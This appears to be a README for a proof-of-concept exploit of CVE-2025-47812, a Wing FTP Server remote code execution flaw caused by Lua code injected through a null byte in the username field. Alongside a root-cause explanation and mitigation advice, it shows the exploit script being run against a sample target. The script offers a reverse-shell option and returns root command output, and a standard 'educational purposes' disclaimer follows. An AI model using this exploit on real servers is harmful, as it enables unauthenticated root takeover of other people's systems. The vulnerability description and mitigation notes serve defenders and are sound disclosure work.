CVE-2025-47812# 🛡️ CVE-2025-47812 – Critical RCE in Wing FTP Server 🛡️
#### 🔎 Overview:
CVE-2025-47812 is a **critical remote code execution (RCE)** vulnerability affecting **Wing FTP Server** versions prior to **7.4.4**. It was discovered by a security researcher and has been confirmed to be **actively exploited in the wild**.
---
### 🧱 Root Cause:
The vulnerability lies in the **authentication logic** of Wing FTP Server, specifically in how it handles **null bytes (`\0`)** in the **`username`** parameter.
Attackers can inject **arbitrary Lua code** through the username field, which the server will write into the session file. When this session file is processed later, the **injected Lua code gets executed**, allowing attackers to run system-level commands.
---
### 🚨 Impact:
* **Severity**: CVSS score of **10.0** (Critical)
* **Access Required**: Unauthenticated or anonymous access is sufficient
* **Exploitation**: Confirmed active exploitation
* **Privileges Gained**: Code runs as **SYSTEM** (Windows) or **root** (Linux/macOS)
* **Affected Platforms**: Windows, Linux, and macOS
---
### 🔧 Mitigation:
* **Update immediately** to **Wing FTP Server version 7.4.4** or later.
* Ensure **public-facing FTP servers** are not exposing `/loginok.html` to untrusted networks.
* Monitor logs for unusual usernames or Lua code injections.
* Implement **network segmentation** to isolate FTP services from internal infrastructure.
---
### 💀 Exploit:
```
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
```
---
### ⚠️ Disclaimer
This exploit is provided for educational purposes only.
Use it responsibly and only on systems you have explicit permission to test.
The author is not responsible for any misuse or damage caused by this tool.
登录后查看神龙缓存的 POC 文件快照
登录查看